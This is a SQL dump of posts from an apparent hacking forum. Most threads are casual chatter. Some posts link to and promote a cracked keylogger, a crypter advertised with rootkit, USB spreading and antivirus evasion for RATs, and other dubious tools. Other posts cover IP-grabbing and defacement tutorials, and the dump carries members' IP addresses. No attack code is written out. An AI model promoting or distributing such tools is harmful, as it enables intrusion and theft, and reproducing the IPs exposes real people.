'0'); INSERT INTO mybb_posts VALUES('6660', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '257', 'XxTREYZxX', '1351573502', 'Sorry but setting up another server is just too much of a pain, maybe later', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', 'd056e935c1f669535f83f3fd1ba6bd9d', '0', '0'); INSERT INTO mybb_posts VALUES('6661', '1020', '5840', '73', 'RE: How to make your ipod\'s battery 90 percent longer', '0', '257', 'XxTREYZxX', '1351573610', 'ahah yeah we always talk about you in this thread ahah', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', '95dd6917c575883a2c8197f6c6c31ac0', '0', '0'); INSERT INTO mybb_posts VALUES('6662', '1138', '6644', '42', 'RE: Hurricane Sandy live updates and discussion', '0', '228', 'VirtualLegend', '1351582721', 'I\'m lucky that i live in Europe xD', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', 'bb30163bc84ecc1359ca0c492b69f685', '0', '0'); INSERT INTO mybb_posts VALUES('6663', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '228', 'VirtualLegend', '1351582831', 'When you have time just contact me', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', '0dac008ee9c37b915b84de82ed0a6f06', '0', '0'); INSERT INTO mybb_posts VALUES('6664', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '302', 'Mac Miller', '1351588376', '10/10 Totidile was teh ish back when i watched the show.', '74.240.167.148', '1257285524', '0', '0', '0', '0', '1', 'ad28651d56cbfc329d075b4f11a354ec', '0', '0'); INSERT INTO mybb_posts VALUES('6665', '1139', '6657', '83', 'RE: [tutorial] How to bully and get away in US', '0', '302', 'Mac Miller', '1351588980', 'Lol thanks for the guide only time I bully is when someone pisses me off or tries to buck up to a woman. But Bullying for no reason to me makes no sense.', '74.240.167.148', '1257285524', '0', '0', '0', '0', '1', '3158230b0f6406dfde9b157abb59daa9', '0', '0'); INSERT INTO mybb_posts VALUES('6666', '1139', '6657', '83', 'RE: [tutorial] How to bully and get away in US', '0', '258', 'PiXEL^OG', '1351590319', 'You and this tutorial make me sick..', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '0a7d8a0def26cf1e4cc54812cf3c8183', '0', '0'); INSERT INTO mybb_posts VALUES('6667', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '205', 'mothered', '1351597322', 'I watched Taken 2 with Liam Neeson.\r\n\r\nI liked the first one better, but this one\'s good too.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '52a4346ab994f4f318e64c21195086c0', '0', '0'); INSERT INTO mybb_posts VALUES('6668', '1139', '6666', '83', 'RE: [tutorial] How to bully and get away in US', '0', '302', 'Mac Miller', '1351598950', '[quote=\'PiXEL^OG\' pid=\'6666\' dateline=\'1351590319\']\r\nYou and this tutorial make me sick..\r\n[/quote]\r\n\r\nlol why would you say that?', '74.240.167.148', '1257285524', '0', '0', '0', '0', '1', 'ee6cf5c7a0f4c1ee6107742432fe528e', '0', '0'); INSERT INTO mybb_posts VALUES('6669', '656', '3267', '8', 'RE: why do ppl like this shitty song!?!?', '0', '302', 'Mac Miller', '1351599006', 'This song sucks the beat makes me sick it\'s just not good at all.', '74.240.167.148', '1257285524', '0', '0', '0', '0', '1', 'dd90d4ce894183f716cd26ee2ff4ddef', '0', '0'); INSERT INTO mybb_posts VALUES('6670', '1140', '0', '8', 'Who likes OFWGKTA?', '0', '302', 'Mac Miller', '1351599108', '[align=center]They are awesome who else likes them here are some songs i like by them.\r\n\r\n[video=youtube]http://www.youtube.com/watch?v=iGk17GBHfiM[/video]\r\n[video=youtube]http://www.youtube.com/watch?v=nQUsCNEL2Y4[/video][/align]', '74.240.167.148', '1257285524', '0', '0', '0', '0', '1', '560f72fa5e5698df202166bbe62666f6', '0', '0'); INSERT INTO mybb_posts VALUES('6671', '1105', '6427', '24', 'RE: Windows 8 Officially released 26-10', '0', '302', 'Mac Miller', '1351599204', 'Idk i have it on some computers already i love it but im not gonna upgrade all my computers though.', '74.240.167.148', '1257285524', '0', '0', '0', '0', '1', 'a4c5dcbba55a2049b1937a9643b06288', '0', '0'); INSERT INTO mybb_posts VALUES('6672', '1133', '6579', '83', 'RE: [Tutorial] Cheating on tests', '0', '2', 'Apathy', '1351599528', 'Or study and not possibly get a zero?', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', '8c8ad7bd0f16a291dbd86f37573c0413', '0', '0'); INSERT INTO mybb_posts VALUES('6673', '1135', '6593', '4', 'RE: Most Dope General in the building!', '0', '302', 'Mac Miller', '1351599788', 'Thanks for the warm welcome I\'m loving it here!!!', '74.240.167.148', '1257285524', '0', '0', '0', '0', '1', 'a8a9ff50fe78d62658fbc30b076cdd34', '0', '0'); INSERT INTO mybb_posts VALUES('6674', '993', '5595', '12', 'RE: Most complete guide to be anonymous', '0', '302', 'Mac Miller', '1351608864', 'This is amazing to bad i don\'t care if people know my stuff.', '208.67.117.50', '-800885454', '0', '0', '302', '1351608918', '1', '5cc7e556b106a882786682dabddaef44', '0', '1351608918'); INSERT INTO mybb_posts VALUES('6675', '1141', '0', '4', 'Hi, I`m CommandoModz', '0', '306', 'CommandoModz', '1351613410', 'Hi! I`m CommandoModz. I`m 15 and live in Florida. I like to mod, play online, etc. If you need to know anything else, ask! :angel:', '184.6.224.250', '-1207508742', '0', '0', '0', '0', '1', '23db2a49f8219d14126bff326fc57503', '0', '0'); INSERT INTO mybb_posts VALUES('6676', '1141', '6675', '4', 'RE: Hi, I`m CommandoModz', '0', '228', 'VirtualLegend', '1351613842', 'Welcome CommandoModz To Da best forum Evar :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '7bdd20765fd2b7e3af712f35d88d4fd4', '0', '0'); INSERT INTO mybb_posts VALUES('6677', '75', '4881', '13', 'RE: ~[TUT]~ How to get someone\'s IP ~[TUT]~', '0', '306', 'CommandoModz', '1351613885', '[quote=\'??zg???g????61\' pid=\'4881\' dateline=\'1350394571\']\r\n[quote=\'mothered\' pid=\'4876\' dateline=\'1350390084\']\r\nI usually use this: http://whatstheirip.com/\r\n\r\nThat said, nice Guides here mate. Good job.\r\n[/quote]\r\n\r\nSame here, ^^\r\n[/quote]\r\n\r\nHaha, this method is a lot simpler than the above ones but they all still work greatly.! :)', '184.6.224.250', '-1207508742', '0', '0', '0', '0', '1', '2adf0a2194962c288febedafec90a3c7', '0', '0'); INSERT INTO mybb_posts VALUES('6678', '508', '2538', '13', 'RE: Awesome deface page source + PSD', '0', '306', 'CommandoModz', '1351613963', 'You should make a tutorial on how to deface someones site! :)', '184.6.224.250', '-1207508742', '0', '0', '0', '0', '1', '929fca8909b1dbdfac70e5c88c8d3a5d', '0', '0'); INSERT INTO mybb_posts VALUES('6679', '656', '3267', '8', 'RE: why do ppl like this shitty song!?!?', '0', '53', 'sirchamp', '1351615147', 'Luckily it hasn\'t reached Switzerland yet.', '120.91.1.228', '2019230180', '1', '0', '0', '0', '1', '5c83099f5dd70e589d2e328a470611c3', '0', '0'); INSERT INTO mybb_posts VALUES('6680', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '228', 'VirtualLegend', '1351617891', '50 cent: All things fall apart\n\nAwesome movie', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '1e75801ab272edc900810622fa4a94b6', '0', '0'); INSERT INTO mybb_posts VALUES('6681', '1141', '6675', '4', 'RE: Hi, I`m CommandoModz', '0', '1', 't3h jok3r', '1351620186', 'Hi Commando, Welcome to L33T Hacking.\n\nThanks for signing up and hope you enjoy your stay.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f9b14469453236cd3f823a4c21368095', '0', '0'); INSERT INTO mybb_posts VALUES('6682', '1138', '6662', '42', 'RE: Hurricane Sandy live updates and discussion', '0', '1', 't3h jok3r', '1351620267', '[quote=\'VirtualLegend\' pid=\'6662\' dateline=\'1351582721\']\r\nI\'m lucky that i live in Europe xD\r\n[/quote]\r\n\r\nGod forbid but anything can happen in Europe too :P', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '642c8ea3a8afc5225936b785524851b8', '0', '0'); INSERT INTO mybb_posts VALUES('6683', '656', '6679', '8', 'RE: why do ppl like this shitty song!?!?', '0', '1', 't3h jok3r', '1351620443', '[quote=\'sirchamp\' pid=\'6679\' dateline=\'1351615147\']\r\nLuckily it hasn\'t reached Switzerland yet.\r\n[/quote]\r\n\r\nSwitzerland? **Writes it down on my notepad saved as d0x of sirch@mp**\r\n\r\nOT: It honestly depends on people and mostly people listen to it to fit in with others to pretend to be cool and shit.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6949ae0791fb5658eef8e4d4095a6c8d', '0', '0'); INSERT INTO mybb_posts VALUES('6684', '1142', '0', '24', 'Fuck you Internet Explorer', '0', '1', 't3h jok3r', '1351620728', 'As some of you know that I had my PC replaced, I \"luckily\" got a used PC that was infected with a virus so now I can\'t download the latest versions of anything which includes chrome, skype(I\'m using the very first version of skype), any VPNs etc.\r\n\r\nThe funny thing is that I got the latest version of internet explorer but it OD sucks. I can\'t copy links easily, etc.\r\n\r\nI hate it. Post your opinions on IE.', '72.231.24.165', '1223104677', '1', '0', '1', '1351623367', '1', 'b688e8b03d764f102d1d90c924201861', '0', '1351623367'); INSERT INTO mybb_posts VALUES('6685', '656', '3267', '8', 'RE: why do ppl like this shitty song!?!?', '0', '53', 'sirchamp', '1351623141', 'Doesnt this site log ip adresses?', '69.50.130.198', '1160938182', '1', '0', '0', '0', '1', '561ed36b8e92c902177be4137cd3aff8', '0', '0'); INSERT INTO mybb_posts VALUES('6686', '656', '6685', '8', 'RE: why do ppl like this shitty song!?!?', '0', '1', 't3h jok3r', '1351623460', '[quote=\'sirchamp\' pid=\'6685\' dateline=\'1351623141\']\r\nDoesnt this site log ip adresses?\r\n[/quote]\r\n\r\nUhh you got me. Are you seriously from switzerland?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cc59eecba3bc3799cb0492c03ff7c145', '0', '0'); INSERT INTO mybb_posts VALUES('6687', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '82', 'iTzIpod', '1351624837', 'If I have time, I\'ll contact you then! ;D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '00176dbf4c2bba175f9b240c75bc698c', '0', '0'); INSERT INTO mybb_posts VALUES('6688', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351624893', '?/10\nI don\'t know who that is.. :p\nI also don\'t really like listening to Mac Miller. :(', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7055c0197654773bac7cace4d4479991', '0', '0'); INSERT INTO mybb_posts VALUES('6689', '1140', '6670', '8', 'RE: Who likes OFWGKTA?', '0', '82', 'iTzIpod', '1351624926', 'I heard about them once.\nStill don\'t know who they are. I don\'t like them or like them either or.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '493d241c2deb0a9f34ac04d8085a8f0f', '0', '0'); INSERT INTO mybb_posts VALUES('6690', '1141', '6675', '4', 'RE: Hi, I`m CommandoModz', '0', '82', 'iTzIpod', '1351625175', 'Welcome to L33tHacking.\nEnjoy your stay.\nI am iTzIpod a very trustworthy and loyal member.\nIf you need any help, or, any questions or concerns, don\'t hesitate to PM me or so.\nPlease read the rules and abide to them. :)\nThanks.', '24.212.197.164', '416597412', '1', '0', '82', '1351634994', '1', '30ab7733d62a9ef659ff91b7d795af2d', '0', '1351634994'); INSERT INTO mybb_posts VALUES('6691', '1142', '6684', '24', 'RE: Fuck you Internet Explorer', '0', '82', 'iTzIpod', '1351625260', 'It\'s slower than a fat man running on a hot sunny day. :o\n\nInternet Explorer sucks.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1198ab58bba3d4a1cfd8076e67192555', '0', '0'); INSERT INTO mybb_posts VALUES('6692', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '67', 'HoverCatz', '1351627356', '10/10 Awesome cap of pokemon', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', '70e810e51e2679392ccb500ba90e2681', '0', '0'); INSERT INTO mybb_posts VALUES('6693', '1141', '6690', '4', 'RE: Hi, I`m CommandoModz', '0', '1', 't3h jok3r', '1351630330', '[quote=\'iTzIpod\' pid=\'6690\' dateline=\'1351625175\']\nWelcome to L33tHacking.\nEnjoy your stay.\nI am iTzIpod a very trustworthy and loyal member.\nIf you have any help, don\'t hesitate to PM me or so.\nPlease read the rules and abide to them. :)\nThanks.\n[/quote]\n\nIf he has help then why would he ask? Umm call a doctor.', '72.231.24.165', '1223104677', '1', '0', '1', '1351630345', '1', '47588a0b3a5cd6e38a9c7858574c75d9', '0', '1351630345'); INSERT INTO mybb_posts VALUES('6694', '1140', '6670', '8', 'RE: Who likes OFWGKTA?', '0', '61', 'NXK', '1351631515', '[video=youtube]http://www.youtube.com/watch?v=7qWyns2GnxU[/video]I like a couple of there songs, I like frank ocean alot, he\'s my fav member for sure.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'daa25bd9527dc1194ad80899de3f6f45', '0', '0'); INSERT INTO mybb_posts VALUES('6695', '1140', '6670', '8', 'RE: Who likes OFWGKTA?', '0', '232', 'BreShiE', '1351631985', 'I\'ve never actually listening to the whole group over a song I think, I\'ve only heard Tyler The Creator, and he\'s quite a good lyricist.', '78.149.58.68', '1318402628', '1', '0', '0', '0', '1', 'a2766d5f8eb8743e12d84c708866f514', '0', '0'); INSERT INTO mybb_posts VALUES('6696', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '228', 'VirtualLegend', '1351634088', '10/10 Really orignal have never seen it in any forums :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'a3b1deee5c7942567daee12f8793b9e5', '0', '0'); INSERT INTO mybb_posts VALUES('6697', '1138', '6682', '42', 'RE: Hurricane Sandy live updates and discussion', '0', '228', 'VirtualLegend', '1351634192', '[quote=\'t3h jok3r\' pid=\'6682\' dateline=\'1351620267\']\r\n[quote=\'VirtualLegend\' pid=\'6662\' dateline=\'1351582721\']\r\nI\'m lucky that i live in Europe xD\r\n[/quote]\r\n\r\nGod forbid but anything can happen in Europe too :P\r\n[/quote]\r\n\r\nI Don\'t think so Netherlands is really specialized in hurricanes', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'c0702c28e827bc881d7c5cd4da12e447', '0', '0'); INSERT INTO mybb_posts VALUES('6698', '1141', '6675', '4', 'RE: Hi, I`m CommandoModz', '0', '82', 'iTzIpod', '1351634959', 'I meant to say need :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '27f9a6dca3a96d2d82659a87987c28d0', '0', '0'); INSERT INTO mybb_posts VALUES('6699', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351635046', '20/10 Sexy ass monkey! :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '02fe4ee72b6a68f4363cf921396f46a5', '0', '0'); INSERT INTO mybb_posts VALUES('6700', '900', '6285', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '228', 'VirtualLegend', '1351638587', '[quote=\'Jacob\' pid=\'6285\' dateline=\'1351109621\']\r\nNo, just browsing around, and yeah I will try to be active here :)\r\n[/quote]\r\n\r\nYour Signature is Done. Check your inbox', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '8dd307c38b53ad6bf95806fb29c49685', '0', '0'); INSERT INTO mybb_posts VALUES('6701', '1141', '6675', '4', 'RE: Hi, I`m CommandoModz', '0', '257', 'XxTREYZxX', '1351642546', 'Welcome my fellow freind enjoy stay and be active', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '0574ea01109e32e6f5e8d15b151385d1', '0', '0'); INSERT INTO mybb_posts VALUES('6702', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '257', 'XxTREYZxX', '1351642940', 'Yeah i will sure contact you when i not busy :P', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '1efde69df96396cfc39d68905f7ff450', '0', '0'); INSERT INTO mybb_posts VALUES('6703', '1142', '6684', '24', 'RE: Fuck you Internet Explorer', '0', '257', 'XxTREYZxX', '1351643022', 'yeah i use chrome its way beast \nvery quick and convenient', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '02a187829c25fddb5271f7e6e3af8ed0', '0', '0'); INSERT INTO mybb_posts VALUES('6704', '1140', '6670', '8', 'RE: Who likes OFWGKTA?', '0', '257', 'XxTREYZxX', '1351643083', 'I have never heard these people ,i will listen to them and see if i like them :O', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '7865dc1fb0cf69e9f7cbe1208526e75e', '0', '0'); INSERT INTO mybb_posts VALUES('6705', '1143', '0', '24', 'NEED HELP', '0', '257', 'XxTREYZxX', '1351643773', 'Hey LH,\r\nI need your help,\r\nrecently i was playing minecraft online and all of a sudden it just disconnected,So i went to connect again and it connected but had a little yellow sign and it says no internet access.And when i go to connect to the internet it says webpage not available if any knows a solution please post below \r\nThank you and that\'s why i haven\'t been active lately because i have to go to my friends house to go on :(', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '520e5728ed7c41267a28ec447311e280', '0', '0'); INSERT INTO mybb_posts VALUES('6706', '1144', '0', '11', 'What can you do with?', '0', '306', 'CommandoModz', '1351648215', 'What can you do with someone`s IP?', '184.6.224.250', '-1207508742', '0', '0', '0', '0', '1', '20ae07fc8fda1142e355f0cbffdb7298', '0', '0'); INSERT INTO mybb_posts VALUES('6707', '893', '4885', '77', 'RE: GamerTag Availability Checker Site', '0', '306', 'CommandoModz', '1351648312', 'Wow, this is a really helpful share! Thanks mate! :)', '184.6.224.250', '-1207508742', '0', '0', '0', '0', '1', 'b5b65b225b8a9c0746d7fd99836d57e7', '0', '0'); INSERT INTO mybb_posts VALUES('6708', '508', '2538', '13', 'RE: Awesome deface page source + PSD', '0', '2', 'Apathy', '1351648942', 'Nice share I will not be downloading but sounds cool.', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', 'ae5bea488c35edd8dd6c6129ad14684e', '0', '0'); INSERT INTO mybb_posts VALUES('6709', '1145', '0', '42', 'Kim Kardashian Sex Tape (40 Mins - Warning 18+)', '0', '5', 'Timmy', '1351651713', '[align=center][align=left][font=Times New Roman][size=medium] [/size][/font][/align][align=left][u][font=Times New Roman][size=medium]Information[/size][/font][/u][/align][align=left][u][font=Times New Roman][size=medium]\r\n[/size][/font][/u][/align][align=left][font=Times New Roman][size=medium]Hello LH members. I provide you with Kim K\'s sex tape. I got it off a guy who actually purchased it. The file is clean but it is too big to scan. Enjoy![/size][/font][/align][align=left][font=Times New Roman][size=medium]\r\n[/size][/font][/align][align=left][font=Times New Roman][size=medium][u]Link to Download[/u][/size][/font][/align][align=left][font=Times New Roman][size=medium][u]\r\n[/u][/size][/font][/align][align=left][font=Times New Roman][size=medium][url=http://db.tt/LEN4FRNm]Here[/url] or [url=http://db.tt/LEN4FRNm]Here[/url] [/size][/font][/align][/align]\r\n\r\nFound this on HMSEF.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4806ce3d253340bdc62d258bb56b6f2e', '0', '0'); INSERT INTO mybb_posts VALUES('6710', '1146', '0', '72', 'DO NOT BUY NFS Most Wanted', '0', '5', 'Timmy', '1351652654', 'I pre-ordered Need for Speed Most Wanted Limited Edition and got it today.\r\n\r\nThis NFS release sucked, was not even close to the old most wanted.\r\n\r\n[b]Why I hate this release?[/b]\r\n- Has no storyline\r\n- In race they are no directions telling you where to turn.\r\n- You can only use the unlocked stuff such as NOS etc only on one car.\r\n- Roads have too many sharp turns\r\n- Has no race startline; Cars are already on 50+ MPH when the race starts\r\n- You don\'t need to beat the backlist member, just reach the amount of points then you are done.\r\n- Police cars are stronger and faster than your cars.\r\n- Police start chasing you from your third race.\r\n- Music Sucks\r\n- You don\'t earn any money to purchase shit, you unlock cars by spotting a car around and clicking drive.\r\n- If you are driving 80 MPH and if you hit something then you \"crash\" and wait for the car to get reseted for 3 seconds and even if your opponent out of the map, when your car resets they are way infront of you.\r\n- Maps aren\'t clear.\r\n- Mostly drive to all your race points\r\n\r\n[b]NEED FOR SPEED MOST WANTED LIMITED EDITION IS A WASTE OF MONEY[/b]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'efc1ad399e7489bedf9695b655a6d360', '0', '0'); INSERT INTO mybb_posts VALUES('6711', '1120', '6530', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '5', 'Timmy', '1351652929', '[quote=\'iTzIpod\' pid=\'6530\' dateline=\'1351394655\']\r\nLegit. Actually works! :) Thanks for the method.\r\nVOUCH.\r\n\r\n:)\r\n\r\nIt\'s not really a Skype premium though..\r\nIt only allows you to call a group with a certain amount of people or whatever.\r\n\r\n[img]http://i.imgur.com/nsolw.png[/img]\r\n[/quote]\r\n\r\nhttp://www.free[b]group[/b]videocallingskype.com/\r\n\r\nThe site is about group so I think it only allows group calling but Hover said that on skype.com it says premium.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9021402071281db599e56a6d60bc7390', '0', '0'); INSERT INTO mybb_posts VALUES('6712', '1127', '6590', '42', 'RE: Up to 100 Hackers to be offered a Job at MI5 or MI6', '0', '5', 'Timmy', '1351653099', '[quote=\'PiXEL^OG\' pid=\'6590\' dateline=\'1351524858\']\r\n[quote=\'mothered\' pid=\'6588\' dateline=\'1351508425\']\r\nI\'ve heard hackers get hired by big corporations, to help protect their systems and business.\r\n\r\nThis doesn\'t surprise me.\r\n[/quote]\r\n\r\nMI5 and 6 are taking a piss , its known by everyone that they have been highly unorganized throughout time\r\n[/quote]\r\n\r\nI agree with both the above statements but once again not surprised as all the big companies including online sites hire hackers to secure their website.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7f569c8850d373afac22b94e0f5867a6', '0', '0'); INSERT INTO mybb_posts VALUES('6713', '1020', '6654', '73', 'RE: How to make your ipod\'s battery 90 percent longer', '0', '1', 't3h jok3r', '1351654586', 'This works, I use the very same method to keep my Ipods battery last more longer. Won\'t work much on an Ipone because of the calls and SMS.\r\n\r\n[quote=\'iTzIpod\' pid=\'6654\' dateline=\'1351560347\']\r\nStop talking about me! :(\r\n\r\n\r\nNah I joke.\r\n\r\nFix the MyCode in your OP.\r\n[/quote]\r\n\r\nThat was my first thought when I saw this thread lol.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'af8094de047c6bca88f6c48c80557436', '0', '0'); INSERT INTO mybb_posts VALUES('6714', '1146', '6710', '72', 'RE: DO NOT BUY NFS Most Wanted', '0', '257', 'XxTREYZxX', '1351654773', 'Thanks for the heads up ,i was going to buy this :L', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', 'bd517a0da7d20d160829d2bc4a37b5f1', '0', '0'); INSERT INTO mybb_posts VALUES('6715', '1097', '6358', '9', 'RE: Monetizing e-book', '0', '7', 'Romdu62', '1351656915', 'What\'s neobux and why is your link not clickible?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '37847e9541f9de9ae13535a43dc92d37', '0', '0'); INSERT INTO mybb_posts VALUES('6716', '1147', '0', '9', 'BRAIN FREEZE - Moneymaking Method', '0', '7', 'Romdu62', '1351656958', 'A simple yet effective money making method on my Desktop\r\n \r\nhttp://hidemyass.com/files/49bNJ/', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'e9933c2e665cac8c8e23224346a77473', '0', '0'); INSERT INTO mybb_posts VALUES('6717', '1097', '6358', '9', 'RE: Monetizing e-book', '0', '257', 'XxTREYZxX', '1351657101', 'Just copy and paste it and neobux is a site where you can earn money', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '29082743552699f342d1c459b06f5c6e', '0', '0'); INSERT INTO mybb_posts VALUES('6718', '1148', '0', '30', '[Crack] Limitless Logger 6.7 !!', '0', '5', 'Timmy', '1351657206', '[align=center][url=http://i.imgur.com/NdEtT.png]#Proof[/url]\r\n\r\nFirst of all the VT :\r\n[align=center]\r\n[url=https://www.virustotal.com/file/454955e07fe8b3f485b54bdd057bb9a33e7f5e6140ffbc85a566c3583a58d4db/analysis/1351074984/][img]https://www.virustotal.com/static/img/logo-small.png[/img][/url]\r\n[img]http://i.imgur.com/3Z7lJ.png[/img][/align]\r\n[align=center]\r\n[img]http://i.imgur.com/3HVme.png[/img][/align]\r\n\r\nDownload: http://www.ge.tt/#!/1FvwF8Q/v/0[/align]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '63d1542965035059c0cfcc4888e7737c', '0', '0'); INSERT INTO mybb_posts VALUES('6719', '508', '2538', '13', 'RE: Awesome deface page source + PSD', '0', '257', 'XxTREYZxX', '1351657213', 'Thanks for the great share mate ,will not be downloading it', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '021f39fa5f98a87975269744ecda72a9', '0', '0'); INSERT INTO mybb_posts VALUES('6720', '1121', '6524', '20', 'RE: JodMod Crypter 1/35 cracked', '0', '5', 'Timmy', '1351657358', 'What\'s wrong with people? Why don\'t they comment on the best thread ever?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '214c7ddd6ceb389bbde482a3b79701d5', '0', '0'); INSERT INTO mybb_posts VALUES('6721', '1148', '6718', '30', 'RE: [Crack] Limitless Logger 6.7 !!', '0', '257', 'XxTREYZxX', '1351657517', 'Thanks for the share i will use this>', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '6005d406a8fc4414ceaf4b39a63d4aa5', '0', '0'); INSERT INTO mybb_posts VALUES('6722', '1149', '0', '20', '[AutoIt] [JY]-R00t Crypter| FUD[USB Spread & sRootKite]ByPass SandBoxie & VM\'s', '0', '5', 'Timmy', '1351657530', '[img]http://i.imgur.com/7EPnB.png[/img]\r\n\r\nFeatures :\r\n\r\nsRootKit >> [Hot] Small RootKite , Hidden task-manager\r\nAll HDD Spread >>[Hot] With .lnk and .jpg files C & D and others\r\nUSB Spread >> [Hot] With .lnk and .jpg files in USB drive\r\nBypass VM\'s << not process detection ^_^\r\nBypass Sandbox << even if you got it just intalled Crypted server wont work\r\nBypass Anubis: Analyzer\r\nBypass ThreatExperet\r\nand much more ^^\r\n\r\n\r\nTested on :\r\nXtreamRAT\r\nStealer\r\nDark Comet\r\nBlack Shades\r\nCyber Gate\r\nPythoRAT\r\nBozok RAT\r\nTinyRAT\r\nBifrost\r\nPoison Ivy\r\n\r\n\r\nTested on :\r\nWin7 64bit\r\nWin7 32bit\r\nWin Xp Sp3\r\nWin Xp Sp2\r\n\r\n[url=http://elementscanner.com//?RE=4b698b73d06b0484c9bb996bd9e85214]SCAN[/url]\r\n[url=http://linkc.at/OSmWla]download[/url]\r\n\r\n[quote]\r\nPass: 2faa02c8124bcc128f3af587f4ff88da\r\n\r\nCracked by Kamz89, password is \"stilldo\"\r\n[/quote]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '00bbd0ec02b172dbe7025bed40d21208', '0', '0'); INSERT INTO mybb_posts VALUES('6723', '1146', '6714', '72', 'RE: DO NOT BUY NFS Most Wanted', '0', '5', 'Timmy', '1351657591', '[quote=\'XxTREYZxX\' pid=\'6714\' dateline=\'1351654773\']\r\nThanks for the heads up ,i was going to buy this :L\r\n[/quote]\r\n\r\nNo problem. Thank god I was able to save atleast one persons money.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a45a4459d01731f43338801eda90a453', '0', '0'); INSERT INTO mybb_posts VALUES('6724', '1121', '6524', '20', 'RE: JodMod Crypter 1/35 cracked', '0', '257', 'XxTREYZxX', '1351657691', 'Thanks for the great share mate i just saw this thread,please help me on my thread here:\nhttp://l33thacking.net/thread-1143.html', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '010048033027f13b84f1b2b19c73a896', '0', '0'); INSERT INTO mybb_posts VALUES('6725', '1146', '6710', '72', 'RE: DO NOT BUY NFS Most Wanted', '0', '257', 'XxTREYZxX', '1351657746', 'Yeah i was going to buy it this weekend,thanks again', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', 'd8b55ca374d9e53a5adfc6b97ed10ec3', '0', '0'); INSERT INTO mybb_posts VALUES('6726', '1150', '0', '18', 'Facebook Creator', '0', '5', 'Timmy', '1351657787', '[align=center][b] FB Creator 3[/b][/align]\r\n\r\n\r\n[img]http://i47.tinypic.com/54ewih.jpg[/img]\r\n\r\nhttps://www.dropbox.com/s/aulj45zys5zpydx/FB%20Creator%203.rar\r\n\r\nVT: 2/42 https://www.virustotal.com/file/405573150db9629e382847ad707299ac9d75a160ca49ff9006bb669a3c957dbf/analysis/1351347149/\r\n\r\n[color=#FF0000][b]i had not checked this so it is recommended that you run it in sandbox , i had added VT scan though[/b][/color]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f42d29c4a74db974b7bbd2a3e0a98f2f', '0', '0'); INSERT INTO mybb_posts VALUES('6727', '1149', '6722', '20', 'RE: [AutoIt] [JY]-R00t Crypter| FUD[USB Spread & sRootKite]ByPass SandBoxie & VM\'s', '0', '257', 'XxTREYZxX', '1351657797', 'Thanks for this i will defiantly use this', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '66516210904b3654f673316566e41d8d', '0', '0'); INSERT INTO mybb_posts VALUES('6728', '1150', '6726', '18', 'RE: Facebook Creator', '0', '257', 'XxTREYZxX', '1351657845', 'HAHA Thanks for this (time to troll)hha', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '619e7148236df2e9be4ce94a36af53dd', '0', '0'); INSERT INTO mybb_posts VALUES('6729', '1151', '0', '18', 'Instaflow [Instagram bot] [Gold Version]', '0', '9', 'p420', '1351657882', 'Features\r\n*Superlike (~900-1000 per hour)\r\n*Automatic liking by hashtag\r\n*(~900-1000 per hour)\r\n*Live-Picture preview\r\n*Taglist 